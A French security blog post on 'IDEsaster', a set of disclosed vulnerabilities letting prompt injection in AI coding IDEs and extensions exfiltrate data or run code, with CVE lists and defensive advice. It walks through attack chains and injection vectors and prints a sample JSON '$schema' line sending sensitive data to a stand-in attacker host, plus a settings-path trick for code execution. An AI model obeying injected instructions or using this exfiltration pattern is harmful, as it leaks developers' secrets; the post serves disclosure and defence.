Se connecter

Vulnérabilités critiques dans les outils de codage basés sur l’IA les plus utilisés (Nom de code IDEsaster)

par | Déc 16, 2025 | Intelligence Artificielle, Vulnérabilité | 1 commentaire

 

 

 

Le 6 décembre 2025, le chercheur en sécurité Ari Marzouk a révélé plus de 30 vulnérabilités affectant plusieurs environnements de développement intégrés (IDE) et extensions basés sur l’intelligence artificielle (IA).

Ces failles, regroupées sous le nom d’IDEsaster, permettent à des attaquants d’exfiltrer des données et d’exécuter du code à distance en exploitant des failles de sécurité dans les outils d’IA intégrés aux IDE.

Outils concernés Les vulnérabilités touchent des IDE et extensions populaires tels que Cursor, Windsurf, Kiro .dev, GitHub Copilot, Zed .dev, Roo Code, Junie, et Cline. Parmi ces failles, 24 ont reçu des identifiants CVE.

Mécanismes d’attaque

Les attaques reposent sur trois étapes clés :

  1. Injection de prompts : Contourner les garde-fous des modèles de langage (LLM) pour détourner le contexte et exécuter des actions malveillantes.
  2. Actions automatiques : Exploiter les outils auto-approuvés par les agents IA pour agir sans interaction utilisateur.
  3. Fonctionnalités légitimes détournées : Utiliser les fonctionnalités des IDE (comme la lecture/écriture de fichiers ou la modification de configurations) pour exfiltrer des données ou exécuter du code arbitraire.

Exemples d’attaques

  • Exfiltration de données : Via des fichiers sensibles lus et envoyés vers un serveur contrôlé par l’attaquant (ex. : CVE-2025-49150, CVE-2025-53097).
  • Exécution de code : En modifiant des fichiers de configuration (comme .vscode/settings.json) pour y insérer des chemins vers des exécutables malveillants (ex. : CVE-2025-53773, CVE-2025-54130).
  • Modification des espaces de travail : Écrire des configurations malveillantes dans les fichiers .code-workspace pour exécuter du code arbitraire (ex. : CVE-2025-64660, CVE-2025-61590).

Vecteurs d’injection

Les attaques peuvent être déclenchées par :

  • Des références de contexte ajoutées par l’utilisateur (URL, texte avec caractères invisibles).
  • Des serveurs MCP (Model Context Protocol) compromis ou malveillants.
  • Des fichiers ou noms de fichiers contenant des instructions cachées.

Recommandations

Pour se protéger, les développeurs et entreprises sont invités à :

  • Limiter l’utilisation des IDE basés sur l’IA à des projets de confiance.
  • Vérifier les sources externes (URL, serveurs MCP) pour éviter les injections de prompts.
  • Appliquer le principe de moindre privilège aux outils LLM et renforcer les systèmes contre les injections de prompts.
  • Sandboxer les commandes et tester régulièrement la sécurité des outils.

Autres vulnérabilités liées :

  • Une faille d’injection de commande dans OpenAI Codex CLI (CVE-2025-61260).
  • Des vulnérabilités dans Google Antigravity permettant l’exfiltration de données et l’exécution de code via des injections indirectes.
  • Une nouvelle classe de vulnérabilités, PromptPwnd, ciblant les agents IA connectés à des pipelines CI/CD (GitHub Actions, GitLab).

Enjeux Ces découvertes soulignent l’urgence d’adopter une approche « Secure for AI », intégrant la sécurité dès la conception des outils IA pour anticiper les abus futurs.

Pourquoi c’est important ?

Les outils d’IA agentiques deviennent omniprésents dans les environnements professionnels, élargissant la surface d’attaque des machines de développement.

Les LLM, incapables de distinguer les instructions utilisateur des contenus externes malveillants, amplifient ces risques.

CVEs mentionnés (identifiants de vulnérabilités) :

  • CVE-2025-49150 (Cursor)
  • CVE-2025-53097 (Roo Code)
  • CVE-2025-58335 (JetBrains Junie)
  • CVE-2025-53773 (GitHub Copilot)
  • CVE-2025-54130 (Cursor)
  • CVE-2025-53536 (Roo Code)
  • CVE-2025-55012 (Zed. dev)
  • CVE-2025-64660 (GitHub Copilot)
  • CVE-2025-61590 (Cursor)
  • CVE-2025-58372 (Roo Code)
  • CVE-2025-61260 (OpenAI Codex CLI)

Pour plus de détails sur chaque CVE, vous pouvez consulter la base de données officielle des vulnérabilités : CVE Details ou NVD (National Vulnerability Database).

Source principale et document de recherche ideaster https://maccarita.com/posts/idesaster/

Proposition de support

Pour plus d’information sur les mesures de sécurité à implémenter et pour conduire une analyse de risque détaillée ou opérationnelle sur vos environnements de développement et systèmes d’IA (IAs), nous sommes disponibles sur contact@cyberdivision.fr et sur la boite vocale de la cyberdivision au 06 75 62 65 84. Un de nos agent prendra rapidement contact avec vous pour conseils et éventuelle prestation si besoin.

Synthèse des risques et mesures de base à implémenter pour se protéger contre IDEsaster

1. Synthèse des pricipaux risques identifiés à ce stade

IDEsaster représente une nouvelle classe de vulnérabilités dans les environnements de développement intégrés (IDE) basés sur l’IA. Contrairement aux vulnérabilités traditionnelles, qui ciblent des composants spécifiques (comme un outil vulnérable ou une configuration modifiable), IDEsaster exploite les fonctionnalités légitimes des IDE sous-jacents pour réaliser des attaques. Voici les principaux risques :

  • Impact universel :

100 % des applications testées (GitHub Copilot, Cursor, Zed. dev, etc.) sont vulnérables, car elles partagent les mêmes bases logicielles (Visual Studio Code, JetBrains, etc.).

  • Exfiltration de données :

Les attaquants peuvent utiliser des schémas JSON distants pour voler des informations sensibles. Par exemple, un fichier .json malveillant peut déclencher une requête GET vers un serveur contrôlé par l’attaquant, exfiltrant ainsi des données.

{ "$schema": "https://attaquant.com/log?data=<DONNÉES_SENSIBLES>" }
  • Exécution de code à distance (RCE) :
  1. En modifiant des fichiers de configuration IDE (comme .vscode/settings.json ou .idea/workspace.xml), un attaquant peut forcer l’IDE à exécuter du code arbitraire. Par exemple, en définissant php.validate.executablePath vers un script malveillant.
  2. Les espaces de travail multi-racines dans Visual Studio Code permettent de contourner les restrictions et d’exécuter du code en dehors du répertoire de travail.
  • Chaînes d’attaques :
  1. Injection de prompts Outils vulnérables Exécution de code : Un attaquant injecte un prompt malveillant, utilise un outil vulnérable pour lire/écrire des fichiers, puis exécute du code arbitraire.
  2. Injection de prompts Outils légitimes Modification des paramètres de l’agent IA : Un attaquant utilise des outils légitimes pour modifier les paramètres de l’agent IA, ce qui permet d’exécuter des commandes sans interaction utilisateur.
  • Vecteurs d’attaque :
  1. Fichiers de règles malveillants.
  2. Serveurs MCP (Model Context Protocol) compromis.
  3. Liens profonds (deeplinks) ou URLs ajoutés par l’utilisateur.
  4. Noms de fichiers ou contenus cachés (caractères Unicode invisibles, commentaires HTML).Fichiers de règles malveillants.
  5. Serveurs MCP (Model Context Protocol) compromis.
  6. Liens profonds (deeplinks) ou URLs ajoutés par l’utilisateur.
  7. Noms de fichiers ou contenus cachés (caractères Unicode invisibles, commentaires HTML).

2. Mesures essentielles pour les développeurs utilisant des IDE basés sur l’IA

Pour réduire les risques, les développeurs doivent adopter les pratiques suivantes :

  1. Utiliser des projets de confiance :
  2. Configurer les agents IA en mode sécurisé :
  3. Surveiller les serveurs MCP :
  4. Revoir les sources externes :

3. Mesures essentielles pour les développeurs concevant* des IDE basés sur l’IA

Les concepteurs d’IDE doivent intégrer le principe « Secure for AI » dès la phase de développement. Voici les mesures clés :

  1. Appliquer le principe de moindre privilège :
  2. Surveiller en continu les fonctionnalités de l’IDE :
  3. Adopter une approche « Zero Trust » :
  4. Isoler les commandes exécutées :
  5. Contrôler les flux sortants :
  6. Tester régulièrement la sécurité :

4. Exemple de configuration sécurisée

Voici un exemple de configuration sécurisée pour un agent IA dans un IDE :

  • Fichier .vscode/settings.json sécurisé :
{ "ai-agent.tools": { "read_file": { "allowed_paths": ["src/**"], "blocked_files": [".env", ".git/**", "*.key"] }, "write_file": { "allowed_paths": ["src/**"], "require_human_approval": true }, "http_fetch": { "allowed_domains": ["api.trusted-domain.com"], "require_human_approval": true } } }
  • Utilisation de sandboxes – Exécuter les commandes dans un conteneur Docker avec des permissions restreintes
docker run --rm -it --read-only --tmpfs /tmp --cap-drop=ALL alpine sh

5. Conclusion

IDEsaster montre que les IDE basés sur l’IA introduisent de nouveaux risques en exploitant des fonctionnalités légitimes. Pour s’en protéger, il est essentiel d’adopter une approche proactive :

  • Pour les utilisateurs : Limiter l’utilisation des agents IA aux projets de confiance et configurer les outils en mode sécurisé.
  • Pour les concepteurs : Intégrer le principe « Secure for AI » dès la conception, appliquer le moindre privilège, et tester régulièrement la sécurité.

En combinant ces mesures, il est possible de réduire significativement les risques tout en bénéficiant des avantages des IDE basés sur l’IA.

Proposition de support

Pour plus d’information sur les mesures de sécurité à implémenter et pour conduire une analyse de risque détaillée ou opérationnelle sur vos environnements de développement et systèmes d’IA (IAs), nous sommes disponibles sur contact@cyberdivision.fr et sur la boite vocale de la cyberdivision au 06 75 62 65 84. Un de nos agent prendra rapidement contact avec vous pour conseils et éventuelle prestation d’analyse de risque, de sécurisation ou de sensibilisation et formation si besoin.

Rappel des CVEs mentionnés (identifiants de vulnérabilités) :

CVE-2025-49150 (Cursor) – CVE-2025-53097 (Roo Code) – CVE-2025-58335 (JetBrains Junie) – CVE-2025-53773 (GitHub Copilot) – CVE-2025-54130 (Cursor) – CVE-2025-53536 (Roo Code) – CVE-2025-55012 (Zed. dev) – CVE-2025-64660 (GitHub Copilot) – CVE-2025-61590 (Cursor) – CVE-2025-58372 (Roo Code) – CVE-2025-61260 (OpenAI Codex CLI)

Pour plus de détails sur chaque CVE, vous pouvez consulter la base de données officielle des vulnérabilités : CVE Details ou NVD (National Vulnerability Database).

Rappel de la source principale d’information et du document de recherche ideaster https://maccarita.com/posts/idesaster/

Appel à contribution

Si vous souhaitez contribuer à cet article ou détailler d’autres risques ou mesure de sécurité, n’hésitez pas à le commenter.

 

 

1 Commentaire

Soumettre un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *